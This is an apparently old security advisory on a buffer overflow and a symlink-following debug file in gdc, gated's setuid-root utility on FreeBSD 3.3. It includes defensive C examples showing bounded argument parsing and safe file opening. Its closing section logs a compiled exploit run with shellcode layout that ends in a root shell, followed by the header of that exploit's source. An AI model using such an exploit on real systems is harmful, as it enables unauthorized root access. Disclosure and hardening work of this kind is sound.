Vulnerabilities in gdc (the gated daemon's control utility) as shipped for FreeBSD 3.3-RELEASE allow certain users to gain root privileges and to overwrite system files. Gdc is installed by default on FreeBSD, and is given the permissions shown:
-rwsr-x--- 1 root wheel 23832 Sep 10 23:21 /usr/local/bin/gdc
(Thus only users in the group 'wheel' may run gdc).
Credit:
This information has been provided by: Brock Tellier.
Vulnerable systems:
Gated-3.5.11 on FreeBSD 3.3-RELEASE
Vulnerability #1
'/usr/local/bin/gdc' contains a buffer overflow that may ONLY be exploited by members of the group 'wheel'. According to the man page, the default group is "gdmaint", but it was not installed this way on the tested system, nor were any instructions given to create a gdmaint group. The overflow happens when gdc is supplied a large -t (wait time) option on the command line.
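The defensive counterpart to this bug class, as an added example that is not gated's own source and does not claim to show how gdc parses -t: the option value is validated with strtol without ever being copied into a fixed-size buffer, and the diagnostic that echoes a bad value is bounded by snprintf plus a precision cap. The MAX_WAIT_SECONDS policy, the 32-byte length cut-off and the 4096-byte sample argument are constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_WAIT_SECONDS 3600L  /* policy chosen for this example */
#define MAX_ARG_LEN      32     /* any -t argument longer than this is junk */
#define MAX_ARG_ECHO     40     /* at most this much of a bad argument is echoed */

/* Parse a "-t <seconds>" argument without copying it anywhere. Returns 0 and
   stores the value, or -1 for anything that is not a plain non-negative
   integer within policy. Length is checked before any parsing is attempted. */
int parse_wait_time(const char *arg, long *out) {
    if (arg == NULL || *arg == '\0') return -1;
    if (strnlen(arg, MAX_ARG_LEN) >= MAX_ARG_LEN) return -1;
    char *end = NULL;
    errno = 0;
    long v = strtol(arg, &end, 10);
    if (errno == ERANGE || end == arg || *end != '\0') return -1;
    if (v < 0 || v > MAX_WAIT_SECONDS) return -1;
    *out = v;
    return 0;
}

/* The error path is where an oversized argument is most often copied back
   out unbounded. snprintf bounds the destination buffer and the %.*s
   precision bounds how much of the untrusted argument is echoed. */
int format_invalid_wait(const char *arg, char *out, size_t outlen) {
    int truncated = strnlen(arg, MAX_ARG_ECHO + 1) > MAX_ARG_ECHO;
    return snprintf(out, outlen, "gdc: invalid wait time: %.*s%s",
                    MAX_ARG_ECHO, arg, truncated ? "..." : "");
}

/* Check helper: 1 if arg parses to expected, 0 if it is rejected. */
int parses_to(const char *arg, long expected) {
    long v = -1;
    return parse_wait_time(arg, &v) == 0 && v == expected;
}

/* Constructed check with a 4096-byte argument, the kind of oversized -t value
   the advisory describes: the parser refuses it and the diagnostic stays well
   inside a 128-byte buffer instead of growing with the input. */
int long_argument_handled(void) {
    char big[4097];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    long v = 0;
    char msg[128];
    int n = format_invalid_wait(big, msg, sizeof msg);
    return parse_wait_time(big, &v) == -1
        && n > 0 && n < (int)sizeof msg && strlen(msg) == (size_t)n;
}

int main(void) {
    printf("\"30\" accepted: %d\n", parses_to("30", 30));
    printf("\"30x\" rejected: %d\n", !parses_to("30x", 30));
    printf("4096-byte argument handled safely: %d\n", long_argument_handled());
    return 0;
}
```

The point of the length check ahead of strtol is that no downstream code (logging, a usage message, a later strcpy someone adds) ever sees an argument longer than the policy allows.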
Vulnerability #2
'/usr/local/bin/gdc' allows debugging output to be written to a file in /var/tmp, and that file is opened in a way that follows symlinks. This vulnerability can be exploited to overwrite root-owned system files (more of a DoS, since it doesn't change the destination file's permissions) regardless of which user ran gdc. Once again, a normal user without wheel or a similar gid cannot run gdc. However, a normal user may create the symlink that a wheel-group user's gdc invocation will then follow.
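An added example, not gated's code, of why this works and what the fix looks like. The "unsafe" function assumes the weak pattern (a fixed name in a world-writable directory opened with fopen("w")); the hardened one opens with O_CREAT|O_EXCL|O_NOFOLLOW so a pre-existing name, symlink or not, is refused. The scenario it runs is constructed in a private mkdtemp directory: an empty "target" file stands in for the root-owned file and "debug.log" is a symlink to it.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed shape of the weak pattern (not gated's actual source): a fixed,
   predictable file name opened with fopen("w"), which silently follows
   whatever that name currently points at. */
FILE *unsafe_open_debug_log(const char *path) {
    return fopen(path, "w");
}

/* Hardened replacement: O_EXCL refuses any pre-existing name (POSIX says a
   symlink at the path fails with EEXIST regardless of its target) and
   O_NOFOLLOW refuses symlinks outright. Returns a descriptor or -1. */
int safe_open_debug_log(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario: private scratch dir, empty regular file "target",
   symlink "debug.log" -> target. All buffers are n bytes long. */
static int make_scenario(char *dir, char *target, char *link, size_t n) {
    snprintf(dir, n, "/tmp/gdcdemo.XXXXXX");
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, n, "%s/target", dir);
    snprintf(link, n, "%s/debug.log", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;
    close(fd);
    return symlink(target, link);
}

static void cleanup(const char *dir, const char *target, const char *link) {
    char fresh[512];
    snprintf(fresh, sizeof fresh, "%s/debug.log.fresh", dir);
    unlink(fresh);
    unlink(link);
    unlink(target);
    rmdir(dir);
}

/* 1 if fopen("w") through the symlink changed the target file (the bug). */
int unsafe_open_follows_symlink(void) {
    char dir[512], target[512], link[512];
    if (make_scenario(dir, target, link, sizeof dir) != 0) return -1;
    FILE *f = unsafe_open_debug_log(link);
    if (f) { fputs("debug output\n", f); fclose(f); }
    struct stat st;
    int followed = (stat(target, &st) == 0 && st.st_size > 0);
    cleanup(dir, target, link);
    return followed;
}

/* 1 if the hardened open refuses the symlink, leaves the target untouched,
   and still creates a genuinely new name. */
int hardened_open_refuses_symlink(void) {
    char dir[512], target[512], link[512], fresh[512];
    if (make_scenario(dir, target, link, sizeof dir) != 0) return -1;
    int via_link = safe_open_debug_log(link);
    snprintf(fresh, sizeof fresh, "%s/debug.log.fresh", dir);
    int via_fresh = safe_open_debug_log(fresh);
    struct stat st;
    int untouched = (stat(target, &st) == 0 && st.st_size == 0);
    int ok = (via_link < 0) && (via_fresh >= 0) && untouched;
    if (via_link >= 0) close(via_link);
    if (via_fresh >= 0) close(via_fresh);
    cleanup(dir, target, link);
    return ok;
}

int main(void) {
    printf("unsafe fopen followed the symlink: %d\n", unsafe_open_follows_symlink());
    printf("hardened open refused the symlink: %d\n", hardened_open_refuses_symlink());
    return 0;
}
```

Refusing a pre-existing name is the right behaviour for a debug log that the program itself creates; if the name must be reused, mkstemp-style unpredictable names in a directory that is not world-writable remove the race entirely.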
Exploits:
For the buffer overflow vulnerability:
$ gcc -o gdcx gdcx.c
$ ls -la `which gdc`
-rwsr-x--- 1 root wheel 23832 Sep 10 23:21 /usr/local/bin/gdc
$ id
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec), 0(wheel)
$ ./gdcx
gdc exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>
eip=0xbfbfdb65 offset=0 buflen=4093
NOPs to 937
Shellcode to 1004
eip to 1008
gdc: invalid wait time:
<non-display characters>
#
(we are now root).
---- gdcx.c ----
/*
* gdc exploit for Freebsd-3.3 yields euid=0(root)
* by default, only group wheel (or whatever your trusted gated group is)
* and root can run gdc
* Brock Tellier btellier@usa.net
*/